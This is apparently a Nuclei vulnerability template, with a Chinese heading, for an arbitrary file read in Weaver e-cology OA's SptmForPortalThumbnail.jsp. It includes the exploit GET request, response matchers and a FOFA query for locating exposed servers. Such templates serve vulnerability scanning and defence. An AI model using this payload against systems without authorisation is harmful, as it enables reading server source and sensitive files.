漏洞描述
The controllable preview parameters of SptmForPortalThumbnail.jsp are not filtered and are directly spliced to the web root directory for file downloading.
weaver-sptmforportalthumbnail-lfi: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read
PoC代码[已公开]
id: weaver-sptmforportalthumbnail-lfi
info:
name: OA E-Weaver SptmForPortalThumbnail - Arbitrary File Read
author: SleepingBag945
severity: high
description: |
The controllable preview parameters of SptmForPortalThumbnail.jsp are not filtered and are directly spliced to the web root directory for file downloading.
reference:
- http://124.223.89.192/archives/e-cology8-14
- https://github.com/GREENHAT7/pxplan/blob/main/xray_pocs/yaml-poc-weaver-weaver_e_cology_oa-readfile-CT-479157.yml
classification:
cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: weaver
product: e-cology
fofa-query: app="泛微-E-Weaver"
tags: weaver,e-cology,oa,lfi,vuln
http:
- method: GET
path:
- "{{BaseURL}}/portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "weaver.general.BaseBean"
- "getServletConfig"
condition: and
- type: word
part: header
words:
- "image/png"
- type: status
status:
- 200
# digest: 4a0a00473045022100b9c08f6655f70f3c0b119ec6895155dd1c2568e9db350ede8f11bcff050defaa022021bc06466042351905d81e5f4e8b180f9bc8be495bd9f73656b577d243fda6a1:922c64590222798bb761d5b6d8e72950